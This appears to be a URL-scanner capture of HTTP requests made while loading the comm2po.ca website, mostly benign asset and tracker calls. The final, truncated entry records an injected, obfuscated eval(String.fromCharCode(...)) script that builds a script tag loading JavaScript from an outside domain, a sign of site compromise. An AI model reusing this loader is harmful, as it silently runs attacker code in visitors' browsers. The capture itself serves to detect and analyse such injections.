8cc36a737b95817fa6d146fb1582d5c32f2850f768fbedb554c0d3cd3c0b2c64
GET /wp-content/uploads/2021/04/Vorlage-513x401.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/en/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us; _ga=GA1.2.1089217015.1663734221; _gid=GA1.2.317090227.1663734221; _gat=1; _gat_gtag_UA_43911422_1=1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:10:56 GMT
etag: "1580dd1-58bd9-5c1700b70e800"
accept-ranges: bytes
content-length: 363481
content-type: image/png
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
142.250.74.170 200 OK 23 B URL HTTP/2 maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
IP 142.250.74.170:0
File type JSON data\012- , ASCII text
Hash e3981ca10169a319d5aa062bf43a5fa1
2c6ed584767b65688ce99b1ebe1a3b7448a67421
8b0b8749aba12de93f3cf5d86f9fac9d6de7cac400a17473718f182a34ebb7e9
GET /maps/api/mapsjs/gen_204?csp_test=true HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/json; charset=UTF-8
vary: Origin, X-Origin, Referer
content-encoding: gzip
date: Wed, 21 Sep 2022 04:23:42 GMT
server: scaffolding on HTTPServer2
cache-control: private
content-length: 23
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
access-control-allow-origin: https://www.comm2po.ca
access-control-expose-headers: vary,vary,vary,content-encoding,date,server,content-length
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash bb4bdc4c3c6869c822618f0b9ef1bdc5
6a438b8d9d87aa30e0989ace7fc0d4cafce1f29d
eb762661b0a0ecc4ccdf50229ce134d0062e8d60698b7ed1970c5073b18f31ac
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash bb4bdc4c3c6869c822618f0b9ef1bdc5
6a438b8d9d87aa30e0989ace7fc0d4cafce1f29d
eb762661b0a0ecc4ccdf50229ce134d0062e8d60698b7ed1970c5073b18f31ac
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash bb4bdc4c3c6869c822618f0b9ef1bdc5
6a438b8d9d87aa30e0989ace7fc0d4cafce1f29d
eb762661b0a0ecc4ccdf50229ce134d0062e8d60698b7ed1970c5073b18f31ac
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
img.youtube.com/vi/GkX0bwjE7pk/maxresdefault.jpg
142.250.74.142 200 OK 92 kB URL HTTP/2 img.youtube.com/vi/GkX0bwjE7pk/maxresdefault.jpg
IP 142.250.74.142:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x720, components 3\012- data
Hash c7ece595beec760ca55923774c3cb05b
5d81e4dc82d4b7f7a8f0c60d64b590d33e05139d
f9560074caa3fbd7298e9181237b56d3eacbffaaaa82d2f7e76c1a17fa221705
GET /vi/GkX0bwjE7pk/maxresdefault.jpg HTTP/1.1
Host: img.youtube.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
content-type: image/jpeg
vary: Origin
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
timing-allow-origin: *
content-length: 92424
date: Wed, 21 Sep 2022 04:23:42 GMT
expires: Wed, 21 Sep 2022 06:23:42 GMT
cache-control: public, max-age=7200
etag: "1552324497"
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
www.facebook.com/tr/?id=294823864328140&ev=PageView&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222404&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=0&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET
157.240.200.35 200 OK 44 B URL HTTP/2 www.facebook.com/tr/?id=294823864328140&ev=PageView&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222404&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=0&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET
IP 157.240.200.35:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash b798f4ce7359fd815df4bdf76503b295
f8cc6addf1707ad236ad9970b0a48f9733d07da5
10d8d42d73a02ddb877101e72fbfa15a0ec820224d97cedee4cf92d571be5caa
GET /tr/?id=294823864328140&ev=PageView&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222404&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=0&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: image/gif
date: Wed, 21 Sep 2022 04:23:42 GMT
expires: Wed, 21 Sep 2022 04:23:42 GMT
last-modified: Fri, 21 Dec 2012 00:00:01 GMT
cache-control: no-cache, must-revalidate, max-age=0
set-cookie:
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
content-length: 44
server: proxygen-bolt
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
www.facebook.com/tr/?id=294823864328140&ev=GeneralEvent&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222408&cd[post_type]=page&cd[post_id]=5395&cd[content_name]=Home&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=1&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET
157.240.200.35 200 OK 44 B URL HTTP/2 www.facebook.com/tr/?id=294823864328140&ev=GeneralEvent&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222408&cd[post_type]=page&cd[post_id]=5395&cd[content_name]=Home&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=1&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET
IP 157.240.200.35:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash b798f4ce7359fd815df4bdf76503b295
f8cc6addf1707ad236ad9970b0a48f9733d07da5
10d8d42d73a02ddb877101e72fbfa15a0ec820224d97cedee4cf92d571be5caa
GET /tr/?id=294823864328140&ev=GeneralEvent&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222408&cd[post_type]=page&cd[post_id]=5395&cd[content_name]=Home&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=1&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: image/gif
date: Wed, 21 Sep 2022 04:23:42 GMT
expires: Wed, 21 Sep 2022 04:23:42 GMT
last-modified: Fri, 21 Dec 2012 00:00:01 GMT
cache-control: no-cache, must-revalidate, max-age=0
set-cookie:
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
content-length: 44
server: proxygen-bolt
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
app.leadfox.co/service/api/rest/
172.67.71.4 200 OK 54 kB URL HTTP/2 app.leadfox.co/service/api/rest/
IP 172.67.71.4:0
File type JSON data\012- , ASCII text, with no line terminators
Hash d838d6598ca6722dc2a3070a681da215
b9f3c56318bd641a155e8366cb8fb536fdf2d9ba
adb994b35b57e6d4e104219274af8e04cd4db0aa9b66703fa0cd2b366f8fd536
GET /service/api/rest/ HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:42 GMT
content-type: application/json
access-control-allow-origin: https://www.comm2po.ca
x-kong-upstream-latency: 2
x-kong-proxy-latency: 0
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LWpMNqIiGLqSWWQtqwoKM3C%2B0AId6%2BF6hsm3wSP1JaZmsZCpzdTfN3Pb8pvGvJFKqp6Rlhp9dP4rlz6%2B5P3UNdgNbk0hmw9k5ITlldJj1RrWVwQSLbEWWyDyFEdd%2FO1y"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006ea9adcb4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
events.api.secureserver.net/t/1/tl/event?cts=1663734222120&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1375111975&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=6bd617ad-ba1d-5044-aa8e-6fc923ae182c&ht=pageview
104.84.152.58 200 OK 43 B URL HTTP/2 events.api.secureserver.net/t/1/tl/event?cts=1663734222120&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1375111975&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=6bd617ad-ba1d-5044-aa8e-6fc923ae182c&ht=pageview
IP 104.84.152.58:0
ASN #20940 Akamai International B.V.
File type GIF image data, version 89a, 1 x 1\012- data
Hash 325472601571f31e1bf00674c368d335
2daeaa8b5f19f0bc209d976c02bd6acb51b00b0a
b1442e85b03bdcaf66dc58c7abb98745dd2687d86350be9a298a1d9382ac849b
GET /t/1/tl/event?cts=1663734222120&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1375111975&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=6bd617ad-ba1d-5044-aa8e-6fc923ae182c&ht=pageview HTTP/1.1
Host: events.api.secureserver.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: image/gif
content-length: 43
access-control-allow-origin: https://www.comm2po.ca
access-control-allow-credentials: true
x-robots-tag: noindex, nofollow
cache-control: private
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000 ; includeSubDomains
x-frame-options: DENY
date: Wed, 21 Sep 2022 04:23:42 GMT
X-Firefox-Spdy: h2
events.api.secureserver.net/t/1/tl/event?cts=1663734222714&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1002697889&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=4aba5dcd-0f0e-5b7c-8b66-ff777e324948&ht=perf&tce=1663734221360&tcs=1663734221360&tdc=1663734222694&tdclee=1663734222232&tdcles=1663734222136&tdi=1663734222121&tdl=1663734221653&tdle=1663734221360&tdls=1663734221360&tfs=1663734221360&tns=1663734221360&trqs=1663734221376&tre=1663734221547&trps=1663734221546&tles=1663734222695&tlee=0&nt=navigate&nav_type=hard
104.84.152.58 200 OK 43 B URL HTTP/2 events.api.secureserver.net/t/1/tl/event?cts=1663734222714&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1002697889&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=4aba5dcd-0f0e-5b7c-8b66-ff777e324948&ht=perf&tce=1663734221360&tcs=1663734221360&tdc=1663734222694&tdclee=1663734222232&tdcles=1663734222136&tdi=1663734222121&tdl=1663734221653&tdle=1663734221360&tdls=1663734221360&tfs=1663734221360&tns=1663734221360&trqs=1663734221376&tre=1663734221547&trps=1663734221546&tles=1663734222695&tlee=0&nt=navigate&nav_type=hard
IP 104.84.152.58:0
ASN #20940 Akamai International B.V.
File type GIF image data, version 89a, 1 x 1\012- data
Hash 325472601571f31e1bf00674c368d335
2daeaa8b5f19f0bc209d976c02bd6acb51b00b0a
b1442e85b03bdcaf66dc58c7abb98745dd2687d86350be9a298a1d9382ac849b
GET /t/1/tl/event?cts=1663734222714&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1002697889&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=4aba5dcd-0f0e-5b7c-8b66-ff777e324948&ht=perf&tce=1663734221360&tcs=1663734221360&tdc=1663734222694&tdclee=1663734222232&tdcles=1663734222136&tdi=1663734222121&tdl=1663734221653&tdle=1663734221360&tdls=1663734221360&tfs=1663734221360&tns=1663734221360&trqs=1663734221376&tre=1663734221547&trps=1663734221546&tles=1663734222695&tlee=0&nt=navigate&nav_type=hard HTTP/1.1
Host: events.api.secureserver.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: image/gif
content-length: 43
access-control-allow-origin: https://www.comm2po.ca
access-control-allow-credentials: true
x-robots-tag: noindex, nofollow
cache-control: private
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000 ; includeSubDomains
x-frame-options: DENY
date: Wed, 21 Sep 2022 04:23:42 GMT
X-Firefox-Spdy: h2
fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
142.250.74.163 200 OK 15 kB URL HTTP/2 fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
IP 142.250.74.163:0
File type Web Open Font Format (Version 2), TrueType, length 15344, version 1.0\012- data
Hash 5d4aeb4e5f5ef754e307d7ffaef688bd
06db651cdf354c64a7383ea9c77024ef4fb4cef8
3e253b66056519aa065b00a453bac37ac5ed8f3e6fe7b542e93a9dcdcc11d0bc
GET /s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15344
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Sat, 17 Sep 2022 12:31:58 GMT
expires: Sun, 17 Sep 2023 12:31:58 GMT
cache-control: public, max-age=31536000
age: 316305
last-modified: Mon, 16 Oct 2017 17:32:55 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%2
0114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
104.22.54.216404 Not Found 99 kB URL HTTP/2 static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%204